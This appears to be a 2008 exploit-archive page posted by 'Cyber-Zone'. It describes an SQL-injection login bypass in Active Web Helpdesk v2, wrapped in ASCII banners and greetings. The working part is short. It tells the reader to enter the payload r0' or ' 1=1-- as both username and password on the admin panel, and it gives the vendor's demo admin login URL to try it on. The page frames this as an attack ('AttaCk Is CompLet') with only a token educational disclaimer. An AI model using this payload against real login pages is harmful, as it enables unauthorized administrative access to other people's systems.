[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability
# Published : 2008-11-29
# Author : Cyber-Zone
# Previous Title : ASPThai.NET Forum 8.5 Remote Database Disclosure Vulnerability
# Next Title : Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit


***********************************************************************************************************************************************************        
[!]                                                                                                                                                     [!]
[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
[!]                                 O    O            O                                 O      O                                                        [!]
[!]                                 O                 O                                       O                                                         [!]
[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
[!]                                           OO                                                                                                        [!]
[!]                                          OO                                                                                                         [!]
[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
[!]                                        OO                  WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM                                  [!]
***********************************************************************************************************************************************************
+----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++                                       [ Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability ]                                           ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
?|   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ?|       ?|                                       ?|
?|   Home     : WwW.IQ-Ty.CoM                                                                              ?|       ?|         MySQL Version Is :            ?|
?|   TeaM     : Mor0ccan nightamres                                                                        ?|       ?|                                       ?|
?|   Script   : http://activewebsoftwares.com                                                              ?|       ?|                ![ ]!                  ?|
?|   Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen=                          ?|       ?|                                       ?|
?|   RisK     : High [?|?|?|?|?|?|?|?|]                                                                            ?|       ?|                                       ?|
?| --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ?|
?|                                                          From The Dark Side Of MoroCCo                                                                 ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
:                                                                                                                                                         :
?|  Remember    :                                                                                                                                          ?|
?|  -------------                                                                                                                                          ?|
?|                                                                                                                                                         ?|
?|  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ?|
?|                                                                                                                                                         ?|

++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++                                           [!]  RaHa NaYda NoooooooooooD ; Anti-Connexion Den MouK [!]                                                 ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++


Bypass : ........

Go To The Admin Panel.
and Login with this information :

username : r0' or ' 1=1--  
password : r0' or ' 1=1--

To Test :

http://activewebsoftwares.com/demoactivewebhelpdesk/adminlogin.aspx?ReturnURL=admindefault.aspx

EnjoY.



+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+----                                                                  ThanX To                                                                       ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ str0ke , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City  ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
=                                                                    [AttaCk Is CompLet]                                                                  =
___________________________________________________________________________________________________________________________________________________________

# www.Syue.com [2008-11-29]